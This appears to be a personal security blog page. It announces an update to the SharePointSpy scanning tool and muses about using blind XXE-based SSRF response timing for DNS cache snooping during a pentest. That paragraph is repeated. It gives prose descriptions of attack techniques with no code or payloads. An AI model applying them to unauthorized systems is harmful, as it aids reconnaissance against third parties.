Friday, December 8, 2017
Happy New Year & Big SharePointSpy update!
Happy New Year!! I hope everyone's is better than the last! To bring in the new year is a big update to SharePointSpy already available on GitHub! It features a new, more user friendly UI, and an anonymous or specific user scan! Please check it out and let me know what you think. Thank you and good luck in the new year!
Sunday, December 3, 2017
DNS cache snooping via Blind XXE based SSRF?
Is this a thing? You tell me.
Say you have an XXE vuln that lets you make HTTP calls only (SSRF) on a pentest, you know its working only because you see packets over port 80 to a server you control coming from the target system, no data exfil or other fun stuff, so no out put of any kind other then server response times. Not much you can do right? Well while playing around I noticed the response time was long when I looked for domains that don't exist. So I switched to subdomains of good root domains and saw the same delay... That is DNS cache snooping yeah? If so its a newish worthless attack vector kinda I think. At least I have not seen any papers on it so it might be new. What do you think?
Say you have an XXE vuln that lets you make HTTP calls only (SSRF) on a pentest, you know its working only because you see packets over port 80 to a server you control coming from the target system, no data exfil or other fun stuff, so no out put of any kind other then server response times. Not much you can do right? Well while playing around I noticed the response time was long when I looked for domains that don't exist. So I switched to subdomains of good root domains and saw the same delay... That is DNS cache snooping yeah? If so its a newish worthless attack vector kinda I think. At least I have not seen any papers on it so it might be new. What do you think?
Subscribe to:
Posts (Atom)